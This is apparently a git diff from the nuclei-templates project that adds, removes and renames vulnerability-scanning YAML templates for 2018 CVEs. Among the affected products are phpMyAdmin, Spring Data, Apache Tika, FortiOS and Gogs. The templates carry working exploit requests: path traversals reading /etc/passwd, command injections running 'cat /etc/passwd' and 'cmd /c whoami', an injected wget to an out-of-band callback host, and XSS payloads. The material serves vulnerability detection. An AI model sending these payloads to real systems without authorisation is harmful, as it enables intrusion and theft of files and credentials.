https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 + tags: cve,cve2018,phpmyadmin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-12613 + cwe-id: CWE-287 + description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)." + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-1273.yaml b/nuclei-templates/CVE-2018/cve-2018-1273.yaml new file mode 100644 index 0000000000..46a3d307c6 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-1273.yaml @@ -0,0 +1,43 @@ +id: CVE-2018-1273 + +info: + name: Spring Data Commons Unauthenticated RCE + author: dwisiswant0 + severity: critical + description: | + Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, + and older unsupported versions, contain a property binder vulnerability + caused by improper neutralization of special elements. + An unauthenticated remote malicious user (or attacker) can supply + specially crafted request parameters against Spring Data REST backed HTTP resources + or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 + tags: cve,cve2018,vmware,rce,spring + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-1273 + cwe-id: CWE-20 + +requests: + - raw: + - | + POST /account HTTP/1.1 + Host: {{Hostname}} + Connection: close + Content-Type: application/x-www-form-urlencoded + + name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + + payloads: + command: + - "cat /etc/passwd" + - "type C:\\/Windows\\/win.ini" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + part: body diff --git a/nuclei-templates/CVE-2018/cve-2018-12998.yaml b/nuclei-templates/CVE-2018/cve-2018-12998.yaml deleted file mode 100644 index d8f965c9a1..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-12998.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2018-12998 - -info: - name: Zoho manageengine Arbitrary Reflected XSS - author: pikpikcu - severity: medium - description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. - reference: - - https://github.com/unh3x/just4cve/issues/10 - - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 - tags: cve,cve2018,zoho,xss,manageengine - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-12998 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - - type: word - words: - - "" - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2018/cve-2018-1335.yaml b/nuclei-templates/CVE-2018/cve-2018-1335.yaml deleted file mode 100644 index 87f73ec29a..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-1335.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2018-1335 - -info: - name: Apache Tika 1.15-1.17 Header Command Injection - author: pikpikcu - severity: high - reference: - - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - - https://www.exploit-db.com/exploits/47208 - tags: cve,cve2018,apache,tika,rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 - cve-id: CVE-2018-1335 - description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." - -requests: - - method: PUT - path: - - "{{BaseURL}}/meta" - headers: - X-Tika-OCRTesseractPath: cscript - X-Tika-OCRLanguage: //E:Jscript - Expect: 100-continue - Content-type: image/jp2 - Connection: close - body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: text/csv" - part: header - - - type: word - words: - - "org.apache.tika.parser.DefaultParser" - - "org.apache.tika.parser.gdal.GDALParse" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-13379.yaml b/nuclei-templates/CVE-2018/cve-2018-13379.yaml deleted file mode 100644 index 93cc9387a3..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-13379.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2018-13379 - -info: - name: FortiOS - Credentials Disclosure - author: organiccrap - severity: critical - tags: cve,cve2018,fortios - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-13379 - cwe-id: CWE-22 - description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests." - reference: - - https://fortiguard.com/advisory/FG-IR-18-384 - - https://www.fortiguard.com/psirt/FG-IR-20-233 - -requests: - - method: GET - path: - - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" - matchers: - - type: word - words: - - "var fgt_lang" diff --git a/nuclei-templates/CVE-2018/cve-2018-13980.yaml b/nuclei-templates/CVE-2018/cve-2018-13980.yaml new file mode 100644 index 0000000000..3f6afd77f7 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-13980.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-13980 + +info: + name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure + author: wisnupramoedya + severity: medium + description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. + reference: + - https://www.exploit-db.com/exploits/45016 + - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 + tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.50 + cve-id: CVE-2018-13980 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14574.yaml b/nuclei-templates/CVE-2018/cve-2018-14574.yaml new file mode 100644 index 0000000000..18f87e359a --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-14574.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-14574 + +info: + name: Django Open Redirect + author: pikpikcu + severity: medium + tags: cve,cve2018,django,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-14574 + cwe-id: CWE-601 + description: "django.middleware.common.CommonMiddleware in Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 has an Open Redirect." + reference: + - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ + - https://usn.ubuntu.com/3726-1/ + - http://www.securitytracker.com/id/1041403 + - https://www.debian.org/security/2018/dsa-4264 + - http://www.securityfocus.com/bid/104970 + - https://access.redhat.com/errata/RHSA-2019:0265 + +requests: + - method: GET + path: + - "{{BaseURL}}//www.example.com" + + matchers-condition: and + matchers: + - type: status + status: + - 301 + - type: word + words: + - "Location: https://www.example.com" + - "Location: http://www.example.com" + part: header diff --git a/nuclei-templates/CVE-2018/cve-2018-14912.yaml b/nuclei-templates/CVE-2018/cve-2018-14912.yaml new file mode 100644 index 0000000000..a4208db1af --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-14912.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-14912 +info: + name: cgit < 1.2.1 Directory Traversal + author: 0x_Akoko + severity: critical + description: cgit_clone_objects in CGit before 1.2.1 has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. + reference: + - https://cxsecurity.com/issue/WLB-2018080034 + - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-14912 + cwe-id: CWE-22 + tags: cve,cve2018,cgit,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-14916.yaml b/nuclei-templates/CVE-2018/cve-2018-14916.yaml new file mode 100644 index 0000000000..984ff08fd7 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-14916.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-14916 +info: + name: Loytec LGATE-902 Directory Traversal + author: 0x_Akoko + severity: critical + description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. + reference: + - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.4 + cve-id: CVE-2018-14916 + cwe-id: CWE-732 + tags: cve,cve2018,loytec,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-15138.yaml b/nuclei-templates/CVE-2018/cve-2018-15138.yaml deleted file mode 100644 index 7548517b7e..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-15138.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-15138 -info: - name: LG-Ericsson iPECS NMS 30M Directory Traversal - author: 0x_Akoko - severity: high - description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs. - reference: - - https://cxsecurity.com/issue/WLB-2018080070 - - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-15138 - cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" - - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-15473.yaml b/nuclei-templates/CVE-2018/cve-2018-15473.yaml deleted file mode 100644 index 0fa74f21ac..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-15473.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2018-15473 - -info: - name: OpenSSH Username Enumeration <= v7.7 - author: r3dg33k,daffainfo,forgedhallpass - severity: medium - description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2018-15473 - cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 - -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - - matchers: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' - - extractors: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_[^\r]+' diff --git a/nuclei-templates/CVE-2018/cve-2018-15517.yaml b/nuclei-templates/CVE-2018/cve-2018-15517.yaml new file mode 100644 index 0000000000..a6c7089cc6 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-15517.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-15517 + +info: + name: D-LINK Central WifiManager - SSRF + description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser. + reference: + - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt + author: gy741 + severity: high + tags: cve,cve2018,dlink,ssrf,oast + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N + cvss-score: 8.60 + cve-id: CVE-2018-15517 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/System/MailConnect/host/{{interactsh-url}}/port/80/secure/" + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2018/cve-2018-15745.yaml b/nuclei-templates/CVE-2018/cve-2018-15745.yaml new file mode 100644 index 0000000000..5b249a3069 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-15745.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-15745 + +info: + name: Argus Surveillance DVR - Directory Traversal + author: gy741 + severity: high + description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. + reference: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt + tags: cve,cve2018,argussurveillance,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-15745 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "for 16-bit app support" + - "[drivers]" + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-16167.yaml b/nuclei-templates/CVE-2018/cve-2018-16167.yaml deleted file mode 100644 index 905c2aa927..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-16167.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-16167 - -info: - name: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated) - author: gy741 - severity: critical - description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. - reference: - - https://www.exploit-db.com/exploits/49918 - - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - tags: cve,cve2018,logontracer,rce,oast - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-16167 - cwe-id: CWE-78 - -requests: - - raw: - - | - POST /upload HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" diff --git a/nuclei-templates/CVE-2018/CVE-2018-16671.yaml b/nuclei-templates/CVE-2018/cve-2018-16671.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-16671.yaml rename to nuclei-templates/CVE-2018/cve-2018-16671.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16716.yaml b/nuclei-templates/CVE-2018/cve-2018-16716.yaml new file mode 100644 index 0000000000..628db2492d --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-16716.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-16716 +info: + name: NCBI ToolBox - Directory Traversal + author: 0x_Akoko + severity: high + description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. + reference: + - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md + - https://nvd.nist.gov/vuln/detail/CVE-2018-16716 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-16716 + cwe-id: CWE-22 + tags: cve,cve2018,ncbi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-16761.yaml b/nuclei-templates/CVE-2018/cve-2018-16761.yaml deleted file mode 100644 index 23f9df48fa..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-16761.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2018-16761 - -info: - name: Eventum <3.4.0 - Open Redirect - author: 0x_Akoko - severity: medium - description: | - Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information. - remediation: | - Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. - reference: - - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - - https://github.com/eventum/eventum/releases/tag/v3.4.0 - - https://nvd.nist.gov/vuln/detail/CVE-2018-16761 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-16761 - cwe-id: CWE-601 - epss-score: 0.00068 - epss-percentile: 0.28116 - cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: eventum_project - product: eventum - tags: cve,cve2018,redirect,eventum,oss,eventum_project - -http: - - method: GET - path: - - '{{BaseURL}}/select_project.php?url=http://interact.sh' - - '{{BaseURL}}/clock_status.php?current_page=http://interact.sh' - - stop-at-first-match: true - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100e1983ab57aad7d2f22f2ba0dea11509f38177f73e307a187c6b61e4dd913d631022100b3efb8776bfa1c1caa13f75f339008475a607f5169e8984cd452e62791d91515:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-16836.yaml b/nuclei-templates/CVE-2018/cve-2018-16836.yaml deleted file mode 100644 index 0a8102bf1d..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-16836.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2018-16836 - -info: - name: Rubedo CMS 3.4.0 - Directory Traversal - author: 0x_Akoko - severity: critical - reference: https://www.exploit-db.com/exploits/45385 - tags: cve,cve2018,rubedo,lfi - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-16836 - cwe-id: CWE-22 - description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI." - -requests: - - method: GET - path: - - "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-17422.yaml b/nuclei-templates/CVE-2018/cve-2018-17422.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-17422.yaml rename to nuclei-templates/CVE-2018/cve-2018-17422.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-18570.yaml b/nuclei-templates/CVE-2018/cve-2018-18570.yaml deleted file mode 100644 index 51249a06a8..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-18570.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-18570 -info: - name: Cross-Site Scripting on Planon web application - author: emadshanab - severity: medium - description: Planon before Live Build 41 has XSS - reference: - - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 - tags: xss,cve,cve2018,planon - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-18570 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2018/cve-2018-18775.yaml b/nuclei-templates/CVE-2018/cve-2018-18775.yaml new file mode 100644 index 0000000000..2325ca6d23 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18775.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-18775 + +info: + name: Cross Site Scripting in Microstrategy Web version 7 + author: 0x_Akoko + description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter + severity: medium + tags: cve,cve2018,microstrategy,xss + reference: https://www.exploit-db.com/exploits/45755 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-18775 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '">' + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/nuclei-templates/CVE-2018/cve-2018-18778.yaml b/nuclei-templates/CVE-2018/cve-2018-18778.yaml new file mode 100644 index 0000000000..556e6cf52e --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18778.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-18778 + +info: + name: mini_httpd Path Traversal + author: dhiyaneshDK + severity: medium + description: ACME mini_httpd before 1.30 lets remote users read arbitrary files. + reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/ + tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-18778 + cwe-id: CWE-200 + +requests: + - raw: + - |+ + GET /etc/passwd HTTP/1.1 + Host: + + unsafe: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2018/cve-2018-18925.yaml b/nuclei-templates/CVE-2018/cve-2018-18925.yaml new file mode 100644 index 0000000000..362dacb369 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-18925.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-18925 +info: + name: Gogs - Remote Code Execution (CVE-2018-18925) + author: princechaddha + severity: critical + description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron. + reference: + - https://www.anquanke.com/post/id/163575 + - https://github.com/vulhub/vulhub/tree/master/gogs/CVE-2018-18925 + - https://nvd.nist.gov/vuln/detail/cve-2018-18925 + remediation: This issue will be fixed by updating to the latest version of Gogs + tags: cve,cve2018,gogs,lfi,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-18925 + cwe-id: CWE-384 + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=en-US; i_like_gogits=../../../../etc/passwd; + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=en-US; i_like_gogits=../../../../etc/dummy; + + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "")' diff --git a/nuclei-templates/CVE-2018/cve-2018-19326.yaml b/nuclei-templates/CVE-2018/cve-2018-19326.yaml new file mode 100644 index 0000000000..783a9f2a6f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-19326.yaml @@ -0,0 +1,51 @@ +id: CVE-2018-19326 + +info: + name: Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion + author: 0x_Akoko + severity: high + description: | + Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files. + impact: | + Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability. + reference: + - https://www.exploit-db.com/exploits/45904 + - https://www.cybersecurity-help.cz/vdb/SB2018120309 + - https://www.zyxel.com/homepage.shtml + - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19326 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-19326 + cwe-id: CWE-22 + epss-score: 0.01158 + epss-percentile: 0.83304 + cpe: cpe:2.3:o:zyxel:vmg1312-b10d_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: zyxel + product: vmg1312-b10d_firmware + shodan-query: http.html:"VMG1312-B10D" + tags: cve2018,cve,lfi,modem,router,edb,zyxel + +http: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/octet-stream" + + - type: regex + part: body + regex: + - "root:.*:0:0:" +# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 